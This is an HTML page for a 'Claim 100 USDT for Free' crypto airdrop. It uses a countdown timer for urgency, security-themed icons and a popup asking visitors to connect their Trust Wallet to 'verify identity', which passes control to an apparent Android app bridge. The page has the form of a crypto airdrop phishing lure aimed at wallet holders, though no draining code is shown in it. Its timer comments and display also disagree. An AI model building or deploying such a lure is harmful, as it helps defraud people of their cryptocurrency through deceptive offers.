<!doctype html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Crypto Airdrop Claim</title> <!-- Font Awesome CDN -->
        <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" rel="stylesheet">
        <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    body {
      font-family: 'Arial', sans-serif;
      background: linear-gradient(135deg, #141e30, #243b55);
      color: #fff;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      height: 100vh;
      overflow: hidden;
    }

    .container {
      text-align: center;
      padding: 20px;
      width: 90%;
      max-width: 400px;
      background: rgba(255, 255, 255, 0.1);
      border-radius: 15px;
      box-shadow: 0 8px 20px rgba(0, 0, 0, 0.3);
      backdrop-filter: blur(10px);
      animation: fadeIn 1s ease-in-out;
      position: relative;
    }

    @keyframes fadeIn {
      from {
        opacity: 0;
        transform: translateY(-20px);
      }
      to {
        opacity: 1;
        transform: translateY(0);
      }
    }

    .logo {
      width: 80px;
      height: 80px;
      margin: 0 auto 10px;
      border-radius: 50%;
      background: linear-gradient(135deg, #4facfe, #00f2fe);
      display: flex;
      align-items: center;
      justify-content: center;
    }

    .logo img {
      width: 60%;
    }

    .title {
      font-size: 1.8em;
      font-weight: bold;
      margin: 15px 0 10px;
    }

    .description {
      font-size: 1em;
      margin: 10px 0 15px;
      opacity: 0.9;
      line-height: 1.5;
    }

    .countdown {
      font-size: 1.2em;
      margin: 15px 0;
      color: #ffcc00;
      font-weight: bold;
    }

    .icons {
      display: flex;
      justify-content: space-around;
      margin: 20px 0;
    }

    .icon {
      width: 60px;
      height: 60px;
      border-radius: 50%;
      background: #fff;
      display: flex;
      align-items: center;
      justify-content: center;
      box-shadow: 0 4px 10px rgba(0, 0, 0, 0.2);
    }

    .icon i {
      font-size: 1.5em;
      color: #4facfe;
    }

    .claim-btn {
      display: inline-block;
      margin-top: 15px;
      padding: 15px 30px;
      font-size: 1.2em;
      font-weight: bold;
      color: #fff;
      background: linear-gradient(45deg, #6a11cb, #2575fc);
      border: none;
      border-radius: 30px;
      cursor: pointer;
      transition: all 0.3s ease;
      text-decoration: none;
      box-shadow: 0 4px 15px rgba(102, 51, 255, 0.6);
      animation: pulse 2s infinite;
    }

    .claim-btn:hover {
      transform: translateY(-5px) scale(1.05);
      box-shadow: 0 8px 30px rgba(102, 51, 255, 0.8);
    }

    @keyframes pulse {
      0%, 100% {
        transform: scale(1);
      }
      50% {
        transform: scale(1.1);
      }
    }

    /* Popup Styles */
    .popup {
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      background: rgba(255, 255, 255, 0.1);
      backdrop-filter: blur(15px);
      color: #fff;
      padding: 20px;
      border-radius: 10px;
      border: 1px solid rgba(255, 255, 255, 0.4);
      box-shadow: 0 8px 20px rgba(0, 0, 0, 0.5);
      text-align: center;
      width: 90%;
      max-width: 350px;
      display: none;
      z-index: 999;
      animation: slideIn 0.5s ease-out;
    }

    @keyframes slideIn {
      from {
        opacity: 0;
        transform: translate(-50%, -60%);
      }
      to {
        opacity: 1;
        transform: translate(-50%, -50%);
      }
    }

    .popup h3 {
      margin-bottom: 15px;
      font-size: 1.5em;
    }

    .popup p {
      font-size: 0.9em;
      line-height: 1.4;
    }

    .popup .popup-icon {
      font-size: 2em;
      color: #00f2fe;
      margin-bottom: 15px;
    }

    .popup .close-btn {
      margin-top: 15px;
      padding: 10px 20px;
      background: #ff416c;
      color: #fff;
      border: none;
      border-radius: 20px;
      cursor: pointer;
      font-size: 1em;
    }

    .popup .close-btn:hover {
      background: #e63946;
    }

    .popup .connect-btn {
      margin-top: 20px;
      padding: 15px 30px;
      background: linear-gradient(45deg, #00f2fe, #00bfff);
      color: #fff;
      font-size: 1.2em;
      font-weight: bold;
      border: none;
      border-radius: 30px;
      cursor: pointer;
      transition: all 0.3s ease;
    }

    .popup .connect-btn:hover {
      transform: translateY(-5px) scale(1.05);
      box-shadow: 0 8px 30px rgba(0, 255, 255, 0.8);
    }

    .popup .close-btn, .popup .connect-btn {
      display: inline-block;
    }

    .overlay {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0, 0, 0, 0.7);
      display: none;
      z-index: 998;
    }

    .close-icon {
      position: absolute;
      top: 10px;
      right: 10px;
      font-size: 1.5em;
      color: #fff;
      cursor: pointer;
    }
  </style>
    </head>
    <body>
        <div class="container">
            <div class="logo"><img src="https://cdn-icons-png.flaticon.com/512/6816/6816365.png" alt="Crypto Logo">
            </div>
            <div class="title">
                Claim 100 USDT for Free
            </div>
            <div class="description">
                Get rewarded for joining the Web3 revolution! Claim your 100 USDT airdrop now before time runs out.
            </div>
            <div class="countdown">
                Offer expires in: <span id="timer">05:00</span>
            </div>
            <div class="icons">
                <div class="icon"><i class="fas fa-shield-alt"></i>
                </div>
                <div class="icon"><i class="fas fa-lock"></i>
                </div>
                <div class="icon"><i class="fas fa-balance-scale"></i>
                </div>
            </div> <button class="claim-btn" onclick="showPopup()">Claim Now</button>
        </div> <!-- Popup -->
        <div class="overlay" id="overlay"></div>
        <div class="popup" id="popup">
            <div class="close-icon" onclick="hidePopup()">
                <i class="fas fa-times"></i>
            </div>
            <div class="popup-icon"><i class="fas fa-wallet"></i>
            </div>
            <h3>Connect Your Trust Wallet</h3>
            <p>We need to connect your Trust Wallet to securely verify your identity and send your 100 USDT reward directly to your account.</p> <button class="connect-btn" onclick="connectTrustWallet()">Connect Trust Wallet</button>
        </div>
        <script>
    let time = 2000; // Total time in seconds (e.g., ~8.3 hours)
    const timerElement = document.getElementById('timer');

    setInterval(() => {
      if (time <= 0) {
        timerElement.textContent = "00:00:00:00"; // Display zeros when time is up
        return;
      }

      time--;

      const days = String(Math.floor(time / (24 * 3600))).padStart(2, '0');
      const hours = String(Math.floor((time % (24 * 3600)) / 3600)).padStart(2, '0');
      const minutes = String(Math.floor((time % 3600) / 60)).padStart(2, '0');
      const seconds = String(time % 60).padStart(2, '0');

      timerElement.textContent = `${hours}:${minutes}:${seconds}`;
    }, 1000);

    // Popup Functions
    const popup = document.getElementById('popup');
    const overlay = document.getElementById('overlay');

    function showPopup() {
      popup.style.display = 'block';
      overlay.style.display = 'block';
    }

    function hidePopup() {
      popup.style.display = 'none';
      overlay.style.display = 'none';
    }

    function connectTrustWallet() {
            if (Android) {
                Android.onConnectTrustWallet();
            } else {
                console.error("AndroidInterface is not defined");
            }
    }
  </script>
    </body>
</html>